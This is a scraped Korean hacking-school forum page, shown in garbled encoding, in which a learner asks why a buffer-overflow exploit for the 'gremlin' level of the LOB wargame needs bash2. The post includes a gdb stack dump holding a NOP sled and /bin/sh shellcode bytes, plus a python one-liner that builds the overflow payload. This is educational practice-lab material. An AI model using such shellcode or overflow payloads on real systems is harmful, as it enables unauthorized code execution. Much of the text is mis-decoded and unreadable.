·¹º§ ÇØÅ·

 2844, 7/143 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   incaro
   LOB Áú¹® µå·Á¿ä. (BASH2)

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=3211 [º¹»ç]


_____[gdb stack]_____________________________________________________________________
....
0xbffffa08:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffa18:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffa28:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffa38:     0x90909090      0x90909090      0xcd58316a      0x89c38980
(gdb)
0xbffffa48:     0x58466ac1      0x685080cd      0x68732f2f      0x69622f68
0xbffffa58:     0x50e3896e      0x99e18953      0x80cd0bb0      0x90909090
0xbffffa68:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffa78:     0x90909090      0x4000f9a8      0x00000002      0xbffffac4
...
(gdb) i reg ebp
ebp            0xbffffa78       -1073743240
_______________________________________________________________________________________
Áú¹® 1) ./gremlin $(python -c 'print "[NOP]"*200 + "[SCHELLCODE]" + "[NOP]*24 + "[RET]"
¿Í °°ÀÌ 260 + [RET] ÁÖ¼Ò·Î ºÐ¸í µ¤¾ú½À´Ï´Ù.
F.T.Z¿¡¼­ Àß µ¤ÇôÁ³´ø RETÁÖ¼Ò°¡ ¿Ö LOB¿¡¼­ 0X4000F9A8·Î ¾ÕºñÆ®°¡ ¾Èµ¤Çô Áö´ÂÁö ¸ð¸£°Ú³×¿ä.
- ±ÛÀ» ã¾Æº¸°í "export LANG=C"µµ Çغ¸¾ÒÁö¸¸ ¼Ò¿ëÀÌ ¾ø½À´Ï´Ù.

Áú¹® 2) ÀÚ²Ù Segmentation fault °¡ ³ª±æ·¡ ã¾Æº¸´Ï "bash2"¸¦ ¾²¶ó´õ±º¿ä.
ºÐ¸í bash2¸¦ ¾²¸é µË´Ï´Ù. ±Ùµ¥ ±× ÀÌÀ¯¿¡ ´ëÇÏ¿© ¸ð¸£°Ú³×¿ä
À§¿¡¼­ ó·³ ¶È°°ÀÌ gdb¿¡¼­ retÁÖ¼Ò°¡ ¾Èµ¤Çô º¸ÀÌ°í.... ´Þ¶óÁøÁ¡À» ¸ð¸£°Ú´Âµ¥... F.T.Z¿¡¼­ bash2¸¦ ¾È½áµµ À߉ç´ø°ÍÀÌ ¿Ö.... "bash2"¸¦ ½á¾ß ±úÁö´ÂÁö ÀÌÀ¯¸¦ ¾Ë°í½Í½À´Ï´Ù.
  Hit : 3624     Date : 2011/05/23 04:43


    
W.H. bash2¸¦ ¾²°í °ø°ÝÇغ¸¸é ¾Ë°ÚÁö¸¸ 0xff ÀÌÈÄ °ªÀÌ ¸ðµÎ Á¦´ë·Î µé¾î°¡´Â °É º¼ ¼ö ÀÕ½À´Ï´Ù.

¹Ý¸é bash¿¡¼­´Â 0xff ÀÌÈÄÀÇ ¸ðµç °ªÀÌ ½Î±×¸® ¹«½Ã°¡ µÇÁÒ.

ÀÌ°É·Î ºÃÀ»¶§ bash¿¡¼­´Â 0xff¸¦ 0x00(NULL) °ªÀ¸·Î ÀνÄÇÏ´Â °Í °°Áö¸¸ Á¤È®ÇÑÁö´Â ¸ð¸£°Ù½À´Ï´Ù.

ÇÏ¿©°£ bash2´Â 0xff °ªÀ» Á¦´ë·Î ÀνÄÇÏ¸ç ±× µÚÀÇ °ªÀ» ¹«½ÃÇÏÁö ¾Ê°í Á¦´ë·Î ³Ö¾îÁֱ⠶§¹®¿¡ bash2¸¦ »ç¿ëÇÏ´Â °Ì´Ï´Ù.

¹ºÂ÷ÀÌ ÀÖ´ÂÁö Á÷Á¢ º¸·Á¸é dumpcode ÀÌ¿ëÇØ º¸¼¼¿ä.		 2011/05/23  
2724   LOB FC4 ŸÀÌź ¤Ð¤Ð [3]     ¿ìÀ×22
 07/17 3317
2723   webhacking.kr 21¹ø ¹®Á¦[1]     jaewonm
 07/11 5836
2722   [lord of bof FC4] titan Áú¹®ÀÖ½À´Ï´Ù!!!!!! Á¦¹ß[3]     ¿ìÀ×22
 07/04 3479
2721   level11->level12 ¿¡¼­ ¸·Èü´Ï´Ù. ÇÏ·çÁ¾ÀÏ À̰Ÿ¸ º¸³×¿ä.....[6]     ozdang
 07/01 2331
2720   [LOB] LEVEL16 - FAKE EBP ¹®Á¦ Áú¹®.[3]     incaro
 06/11 2921
2719   Level 1¿¡¼­ level2 ±ÇÇÑ¿¡ ´ëÇÑ Áú¹®[3]     yootaeil
 06/09 2915
2718   lob fc4 Enimga ³Ê¹« ¾î·Á¿ö¿ä ~!!!     ¿ìÀ×22
 06/02 3099
2717   LOB Áú¹®]] ¿Ö! 16ByteÀÌ¿©¾ß Çϴ°¡.[7]     incaro
 06/01 3077
2716   webhacking.kr ¼Ò½ºº¸°í³ª¼­[1]     Ǭ¼ö¿ÕÀÚ
 06/01 2507
  LOB Áú¹® µå·Á¿ä. (BASH2)[1]     incaro
 05/23 3623
2714   LOB FC4°¡ ¶ÇÀÖ³ª¿ä?     chofly
 05/22 2558
2713   LOB FC4 enigma ÈùÆ® Á» ÁÖ¼¼¿ä     ¿ìÀ×22
 05/17 3965
2712   [¹®Á¦ Level11]¾î¶²½©ÄÚµå´ÂµÇ°í ¾î¶²°Ç ¾ÈµÇ°í... ÇÞ°¥¸®³×¿ä..[2]     incaro
 05/16 3089
2711   µµ´ëü... Level11Àº level10°ú ¿ÖÀÌ·¸°Ô Áö½ÄÂ÷ÀÌ°¡ ³ª´Â°ÅÁÒ;[1]     darkofgy
 05/15 2555
2710   LOB ½ÃÀÛÇߴµ¥¿ä ...[4]     w7040
 05/08 2420
2709   Level8 ±×³É Çѹø °í¹ÎÇß´ø°É ¾ê±âÇغ¾´Ï´Ù     ÀÌÇö¹è
 04/29 2299
2708   ·¹º§ 5->·¹º§6 °úÁ¤¿¡¼­ suid°¡ ÇØÁ¦µÇ¾îÀÖ½À´Ï´Ù..[4]     traciare
 04/28 2310
2707   FC3¿¡¼­ GOT¿À¹ö¶óÀÌÆà Áú¹®ÀÖ½À´Ï´Ù..,[2]     ¿ìÀ×22
 04/25 3761
2706   lob fc3 fgets·Î ÀԷ¹޴ ¿À¹öÇ÷οì°ü·Ã Áú¹®ÀÖ½À´Ï´Ù.[3]     ¿ìÀ×22
 04/14 4257
2705   ftz ¸¦ ÇÏ´Ù°¡ ¸®´ª½º¸¦ ±ò¾Æ¤²¤È¤µ´Âµ¥ [3]     yangseungjin
 04/11 2571
[1][2][3][4][5][6] 7 [8][9][10]..[143]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org